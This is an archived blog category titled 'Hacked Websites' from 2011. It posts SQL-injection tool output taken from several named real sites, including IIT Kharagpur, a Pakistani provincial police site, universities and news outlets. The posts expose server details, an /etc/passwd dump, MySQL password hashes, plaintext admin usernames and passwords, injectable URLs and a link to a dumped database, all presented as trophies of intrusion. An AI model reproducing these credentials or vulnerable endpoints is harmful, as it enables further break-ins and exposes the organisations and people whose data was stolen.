RSS

Category Archives: Hacked Websites

Detected Blind SQl Vulnerabulity in IIT Kharagpur (http://www.iitkgp.ac.in/)


The history of the IIT system dates back to 1946 Embedded With highly talented professors and Students But there website is vulnerable with High threat level Vulnerability Blind SQL Injection.

Vulnerability description

This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn’t properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.

This vulnerability affects /xxxx.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

The impact of this vulnerability

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Target:         http://www.iitkgp.ac.in/
Host IP:        203.110.245.243
Web Server:     Apache/2.2.3 (Red Hat)
Powered-by:     PHP/5.1.6
DB Server:     MySQL >=5
Resp. Time(avg):    107 ms
Current User:     rootrt@localhost
Sql Version:     5.0.45
Current DB:     profiles
System User:     rootrt@localhost
Host Name:     www.iitkgp.ac.in
Installation dir:     /usr/

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
alokes:x:500:500:Alokes Chattopadhyay:/home/alokes:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

Advertisements
 
1 Comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakisthan (balochistanpolice) http://www.balochistanpolice.gov.pk/page.php?id=3


Target:         http://www.balochistanpolice.gov.pk/page.php?id=3
Host IP:        213.171.219.2
Web Server:     Microsoft-IIS/6.0
Powered-by:     PHP/5.2.6
DB Server:     MSAccess
Resp. Time(avg):    760 ms
Web Root:     c:\php\
Drive:         c:
d: (Drive error! maybe it’s CD-ROM)

 

DB Detection: MSAccess (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Agenceva (http://www.agencevu.com/stories/index.php?id=1021&p=238)


Target:         http://www.agencevu.com/stories/index.php?id=1021&p=238
Host IP:        91.121.167.130
Web Server:     Apache
DB Server:     MySQL >=5
Resp. Time(avg):    438 ms
Current User:     proxygen@localhost
Sql Version:     5.0.51a-3ubuntu5.8-log
Current DB:     agencevu
System User:     proxygen@localhost
Host Name:     ns202929.ovh.net
Installation dir:     /usr/
DB User & Pass:     root:*D18C1385B4395880C65781B30EFA386C07D51782:localhost
root:*D18C1385B4395880C65781B30EFA386C07D51782:
debian-sys-maint:*4E8A230C2B6061B77CC829BB42AC0032B8B79556:localhost
debian-sys-maint:*4E8A230C2B6061B77CC829BB42AC0032B8B79556:
pma:*E23766DD062B325046F2A4441A0E0432A84E3FC7:localhost
proxygen:*F9A985BBE5417B9FCD79A841D8B20208663C2C32:
felixfm7:*1EA326C35707BE1F10B2755B7D692E514A51C6CF:
abventix:*581DB7D12F23B37DA3A7E93B4C1B865A74F81AF2:
web:*CD0D371B47B0E3B18186E8B58218F942B5A13F20:
cigraphit:*C3852B4EEC5C5DE6A78962ACABC27090B8D40BFB:
ticketusfm10:*92C6E3A36C987F05B988787D280052111AC62771:
ticketusfm10:*92C6E3A36C987F05B988787D280052111AC62771:%
wikiadmin:*D18C1385B4395880C65781B30EFA386C07D51782:
status::localhost
Data Bases:     information_schema
abvent
agencevu
backup_renderin
cigraph
galerievu
mysql
oonline
status
store
test-restore

agencevu
Table Name Columns
zones_geo
workshops
villes_pays
users droits id_type password email prenom nom id_user
types_photographes
type_user
type_portfolios
type_contenu
type_communiques
traductions
selections
reportages
prospects_corpo
prospects_concours
prix
portfolios
photos_selections
photos_reportages
photos_galerievu
photos_expositions
photos_corporate
photos_clients
photographes
pays
news
menus
livres
lieux
interviews
homepage
home_reportages
galerievu
expositions
cv_corporate
coucours_corporate
corporate
continents
concours_corporate8
concours_corporate7
concours_corporate6
concours_corporate5
concours_corporate4
concours_corporate3
concours_corporate2
communiques
clients
boites
asso_reportages_photographes
asso_prix_photographes
asso_livres_photographes
asso_expos_photographes
asso_com_photographes

 

information_schema
Table Name Columns

 

abvent
Table Name Columns

 

backup_renderin
Table Name Columns

 

cigraph
Table Name Columns

 

galerievu
Table Name Columns

 

mysql
Table Name Columns

 

oonline
Table Name Columns

 

status
Table Name Columns

 

store
Table Name Columns

 

test-restore
Table Name Columns
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakisthan hubbardbreeders ( http://www.hubbardbreeders.com/news/index.php?id=66)


Target:         http://www.hubbardbreeders.com/news/index.php?id=66
Host IP:        195.78.94.19
Web Server:     Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.0a PHP/5.3.5 with Suhosin-Patch
Powered-by:     PHP/5.3.5
DB Server:     MySQL >=5

Username: Admin

Password: Ecuador

hubbard
Table Name Columns
users jobtitle companyname country email lastname firstname id
translations
technicalbulletins
subproducts
staticpages
regions
products
newsletter
news
managementtypes
managementguides
library
industryevents
downloads
countries
backgrounds
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakisthan HAZARA University ( http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2 )


Target: http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2
Date: 6/18/2011 2:47:33 PM
DB Detection: MySQL error based (Auto Detected)
Method: GET
Type: String (Auto Detected)
Data Base: c3results
Table: admin
Total Rows: 1

 

id u_name passwrd
123_admin_123 123_hazara_123

 

 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked PAKISTHAN Online News(http://www.onlinenews.com.pk/details.php?id=180339)


Target: http://www.onlinenews.com.pk/details.php?id=180339
Host IP: 203.124.43.81
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.8
DB Server: MySQL
Resp. Time(avg): 1150 ms
Current User: onlinenews@localhost
Sql Version: 5.0.45-community-nt
Current DB: onlinenews
System User: onlinenews@localhost
Host Name: host06
Installation dir: C:\Program Files\MySQL\MySQL Server 5.0
DB User: ‘onlinenews’@’%’
Data Bases: information_schema
onlinenews

 

onlinenews
Table Name Columns
writers date address email name writerId
writerdetails
voteanswers
vote2questions
vote2choice
vote2answers
vote1
urduheads
urduarticles
triger
summary_results
sadmin2 priority signature password login id
publicopinion
pictorial
picofday
parties
news
maincategories
intranetfiles
intranet
heads
floodcontrol
contestant
constituency
assemblies
arabic

Username: Admin

Password: 4bc2cfed02b6bebf99b6646c82cec3b8  (onlineunited507)

Hash: onlineunited507

Pinformation_schema

 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

PAKBUGS Complete DataBase


https://www.box.net/shared/vpgzcxct80ya40dd38cr

 

 
Leave a comment

Posted by on June 19, 2011 in Hacked Websites